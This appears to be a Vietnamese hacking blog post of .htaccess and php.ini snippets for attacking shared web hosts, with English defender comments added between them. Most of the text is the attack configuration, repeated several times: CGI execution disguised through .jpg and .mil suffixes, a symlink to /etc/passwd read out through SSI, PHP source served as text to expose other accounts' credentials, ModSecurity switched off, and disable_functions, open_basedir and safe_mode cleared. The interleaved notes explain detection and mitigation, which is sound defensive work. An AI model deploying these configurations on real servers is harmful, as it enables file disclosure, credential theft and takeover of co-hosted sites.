Sử dụng tùy trường hợp
cgitelnet symlink htaccess
symlink ghi vào file.hack
download file.hack về
# Defender note: this .htaccess pattern turns a user-writable web directory
# into a CGI execution and file-disclosure point. It only takes effect where
# the server's AllowOverride grants Options and FileInfo to user directories.
# Mitigation: restrict AllowOverride (for example an explicit Options=
# allow-list without ExecCGI, FollowSymLinks or Indexes) and keep upload
# directories non-executable.
Options +ExecCGI
# Registers extra suffixes, including an image suffix, as CGI scripts. A
# cgi-script handler mapped to .jpg in a user .htaccess is a strong indicator
# of compromise and is worth a file-integrity / grep rule.
AddHandler cgi-script cgi pl cgi love jpg
RewriteEngine on
# Maps requests for a .mil URL onto the matching .cgi file; presumably so the
# requested extension in access logs does not look like a script.
RewriteRule (.*).mil$ $1.cgi
# Asks the server to follow symlinks out of this directory. Apache's own
# documentation says symlink checks are race-prone and not a security
# boundary, so the real control is filesystem permissions and per-account
# isolation that stop the web server identity reading other accounts' files.
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
# Strips any handler from .hack and serves it as plain text, matching the
# steps above where the symlink target is written to file.hack and downloaded.
RemoveHandler .hack
AddType text/plain .hack
SSI VIEW SYMLJNK
.htaccess
# Defender note: enables server-side includes so an .shtml page can pull in
# another file's contents; the listing that follows pairs this with a symlink
# to a system file. It requires AllowOverride to grant Options (Includes) and
# FileInfo. Mitigation: do not grant Includes to user directories (at most
# IncludesNOEXEC where SSI is genuinely needed) and alert on .shtml files
# appearing next to newly created symlinks.
Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml
ln -s /etc/passwd tyn.txt
tyn.shtml:
<!--#include virtual="tyn.txt" -->
direct symlink view file.php dưới dạng file text
# Defender note: per the label above, the goal is to have PHP source reached
# through a symlink returned as text instead of being executed, which exposes
# credentials stored in other accounts' configuration files.
# Mitigation: keep credential-bearing files owner-only (for example mode 0600
# under per-user PHP execution), restrict AllowOverride so users cannot set
# Options or FileInfo, and flag any user .htaccess that re-types .php.
options all
Options +FollowSymLinks
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
# Re-labels .php as text/plain and swaps its handler; whether this actually
# stops execution depends on how PHP is wired into the server (assumption,
# confirm per SAPI).
AddType text/plain .php
AddHandler server-parsed .php
Safe mode off
# Defender note: three separate controls are targeted here - symlink/index
# options, the web application firewall, and the PHP configuration path.
# All of them depend on the host letting user .htaccess files override
# server policy; a tight AllowOverride neutralises the whole fragment.
Options +FollowSymLinks
DirectoryIndex ssssss.htm
Options All Indexes
# mod_security.c and the SecFilter* names belong to ModSecurity 1.x. Under
# ModSecurity 2.x the module identifier differs, so this IfModule block is
# skipped, and .htaccess-level ModSecurity configuration is not enabled in a
# default build. Mitigation: run a supported ModSecurity release with its
# configuration in server scope only, and grep user .htaccess files for
# SecFilterEngine / SecRuleEngine as a compromise indicator.
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
# Points CGI-style PHP (PHPRC) and suPHP at a php.ini inside the account's own
# web root, i.e. a file the site owner or an intruder can rewrite.
# Mitigation: pin the ini location in server-side configuration so per-account
# files cannot relax disable_functions or open_basedir; suPHP deployments
# commonly do this in suphp.conf (confirm for your build).
SetEnv PHPRC /home/user/public_html/php.ini
suPHP_ConfigPath /home/user/public_html/php.ini
# Defender note: repeat of the preceding fragment. It combines symlink and
# directory-index options, an attempt to switch off ModSecurity, and a
# redirect of PHP's configuration path into the web root. None of it applies
# when AllowOverride denies Options and FileInfo to user directories.
Options +FollowSymLinks
DirectoryIndex ssssss.htm
Options All Indexes
# ModSecurity 1.x module name and directives; skipped entirely where only
# ModSecurity 2.x is loaded. Presence of this block in a user .htaccess is
# still a useful indicator of compromise.
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
# User-controlled php.ini path. Mitigation: fix the ini path server-side and
# enforce disable_functions / open_basedir where account files cannot
# override them.
SetEnv PHPRC /home/user/public_html/php.ini
suPHP_ConfigPath /home/user/public_html/php.ini
or
# Defender note: variant of the CGI/symlink fragment at the top of the page.
# Requires AllowOverride Options and FileInfo. Detection: user .htaccess
# files that add cgi-script handlers for non-script suffixes, or that enable
# FollowSymLinks and Indexes together in a directory that receives uploads.
Options +ExecCGI
AddHandler cgi-script cgi pl cgi love jpg
RewriteEngine on
# Requests for *.mil are rewritten to the matching *.cgi file.
RewriteRule (.*)\.mil$ $1.cgi
# Symlink following is not a security boundary in Apache; isolate accounts at
# the filesystem level instead of relying on Options.
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
# .hack files are stripped of handlers and served as plain text.
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##
php.ini:
; Defender note: a user-supplied php.ini that tries to switch off PHP's
; restrictions. It matters only where the PHP SAPI honours an ini file from
; the account's own directory. safe_mode and its companion settings were
; removed in PHP 5.4, so on supported PHP the controls that matter are
; disable_functions and open_basedir; set those in the system php.ini or the
; FPM pool configuration, not anywhere a site owner can write.
; Finding this file in a web root is an indicator of intent whether or not
; PHP accepted any of its keys.
safe_mode=Off
Disable_Functions=None
Open_Basedir=None
Safe_Exec_Dir=None
Safe_Gid=None
Safe_Include_Dir=None
Sql.safe_mode=None
cURL=Off
MySQL=Off
MSSQL=Off
PostgreSQL=Off
Oracle=Off
or
# Defender note: attempts to disable the WAF from a user .htaccess using
# ModSecurity 1.x names. The block is ignored when mod_security.c is not the
# loaded module (ModSecurity 2.x registers under a different identifier).
# Keep WAF configuration in server scope and alert on SecFilter*/SecRule*
# directives appearing in account-owned files.
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterSanPOST Off
</IfModule>
#START #
# Defender note: shorter CGI/symlink fragment. It enables CGI execution for
# the listed suffixes (including a non-standard one), symlink following and
# directory listing. Blocked by an AllowOverride policy that withholds
# Options and FileInfo from user directories.
Options +ExecCGI
AddHandler cgi-script cgi pl tmt
Options +FollowSymLinks
DirectoryIndex seees.html
Options +Indexes
VIEW file.php
# Defender note: per the label above, this aims to have .php (and .html)
# content returned as plain text and to lift access restrictions on the
# directory. The type/handler lines need AllowOverride FileInfo; the
# Require/Satisfy lines need AllowOverride AuthConfig.
# Mitigation: withhold those override classes from user directories and keep
# secrets out of files the web server identity can read.
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
# Intended to drop authentication/host restrictions for this directory
# (assumption from the directive names; confirm against the Apache version).
Require None
Satisfy Any
hạ safe_mode
php.ini
# Defender note: although listed under a php.ini label, these are Apache
# .htaccess directives, the same CGI/symlink fragment shown earlier.
# Effective only with AllowOverride Options and FileInfo. Detection: any
# user .htaccess that maps cgi-script onto image or invented suffixes.
Options +ExecCGI
AddHandler cgi-script cgi pl cgi love jpg
RewriteEngine on
# Requests for *.mil are rewritten to the matching *.cgi file.
RewriteRule (.*)\.mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
# .hack files lose any handler and are served as plain text.
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##
php.ini:
; Defender note: repeat of the user-supplied php.ini shown earlier. It has an
; effect only where PHP reads an ini file from the account's directory.
; safe_mode was removed in PHP 5.4; enforce disable_functions and
; open_basedir in system-level configuration that account files cannot
; override, and treat a php.ini like this in a web root as an indicator of
; compromise.
safe_mode=Off
Disable_Functions=None
Open_Basedir=None
Safe_Exec_Dir=None
Safe_Gid=None
Safe_Include_Dir=None
Sql.safe_mode=None
cURL=Off
MySQL=Off
MSSQL=Off
PostgreSQL=Off
Oracle=Off
or
# Defender note: ModSecurity 1.x-era attempt to turn the WAF off from
# .htaccess. It is ignored where mod_security.c is not loaded. Keep WAF
# settings in server scope and search account files for these directives.
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterSanPOST Off
</IfModule>
#START #
# Defender note: enables CGI execution for the listed suffixes plus symlink
# following and directory listing. It has no effect when AllowOverride
# withholds Options and FileInfo from user directories.
Options +ExecCGI
AddHandler cgi-script cgi pl tmt
Options +FollowSymLinks
DirectoryIndex seees.html
Options +Indexes
VIEW file.php
# Defender note: re-types .php and .html as plain text and tries to lift
# access restrictions. It needs AllowOverride FileInfo and AuthConfig.
# Mitigation: deny those override classes to user directories and keep
# credential files unreadable to the web server identity.
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
# Presumably meant to remove authentication/host restrictions; confirm how
# the deployed Apache version treats these values.
Require None
Satisfy Any
hạ safe_mode
php.ini
; Defender note: minimal per-account php.ini that clears the function
; blocklist. disable_functions is only honoured from PHP's main configuration,
; so the exposure is a hosting setup that lets an account substitute its own
; php.ini. Pin the ini path server-side and keep the blocklist in system or
; FPM pool configuration.
safe_mode = Off
disable_functions = ""
.htaccess
# Defender note: switches off ModSecurity 1.x request filtering for the
# directory. The module identifier and directive names are 1.x-specific, so
# the block is skipped under ModSecurity 2.x. Keep WAF policy in server scope
# and alert when these directives show up in account-owned .htaccess files.
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
.htaccess
# Defender note: a run of alternative .htaccess attempts to weaken PHP.
# Directives that the server does not permit or recognise in .htaccess make
# Apache return HTTP 500 and log an "Invalid command" / "not allowed here"
# error, so a burst of such errors from one directory is a detection signal.
# Routes .php to a PHP 4 handler, presumably an older interpreter left
# installed alongside the default; remove legacy handlers from the server.
AddHandler application/x-httpd-php4 .php .php4 .php3
.htaccess
# php_flag is only available under mod_php and only for settings that may be
# changed per directory; disable_functions must be set in php.ini.
php_flag safe_mode off
php_flag disable_functions ""
.htaccess
# PHP documents php_admin_value as unusable in .htaccess; it exists so that
# administrators can lock settings in server configuration.
php_admin_value disable_functions ""
php_admin_value safe_mode off
.htaccess
disable_functions = ""
.htaccess
# Defender note: repeat of the ModSecurity 1.x disable block. It is ignored
# where mod_security.c is not the loaded module. Mitigation: keep a supported
# ModSecurity with server-scope configuration and monitor account .htaccess
# files for SecFilter*/SecRule* directives.
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
.htaccess
# Defender note: repeat of the handler-switch and php_flag / php_admin_value /
# php_value attempts. Per PHP's documentation disable_functions is settable
# only in php.ini and php_admin_* cannot be used in .htaccess, so the
# defensive priority is making sure no per-account php.ini is honoured.
# Unsupported directives here surface as HTTP 500 with an error-log entry.
AddHandler application/x-httpd-php4 .php .php4 .php3
.htaccess
php_flag safe_mode off
php_flag disable_functions ""
.htaccess
php_admin_value disable_functions ""
php_admin_value safe_mode off
.htaccess
php_value safe_mode off
php_value disable_functions ""
php_value disable_functions ""
.htaccess
# Defender note: these fragments try to make PHP load a php.ini from inside
# the account's web root, and to force .php through a PHP 4 handler.
# SetEnv and ForceType are governed by AllowOverride FileInfo.
# Mitigation: pin the PHP configuration path in server-side settings (suPHP
# installations commonly do this in suphp.conf; confirm for your build),
# remove unused legacy PHP handlers, and watch for php.ini files created in
# web roots.
SetEnv PHPRC /home/user/public_html/php.ini
SetEnv PHPRC /home/user/public_html/php.ini
.htaccess
suPHP_ConfigPath /home/user/public_html/php.ini
.htaccess
# Forces every .php file in the directory onto the php4 handler type.
<Files *.php>
ForceType application/x-httpd-php4
</Files>
suPHP_ConfigPath /home/user/public_html/php.ini
.htaccess
<Files *.php>
ForceType application/x-httpd-php4
</Files>
Source: TYN-UG™ Blog's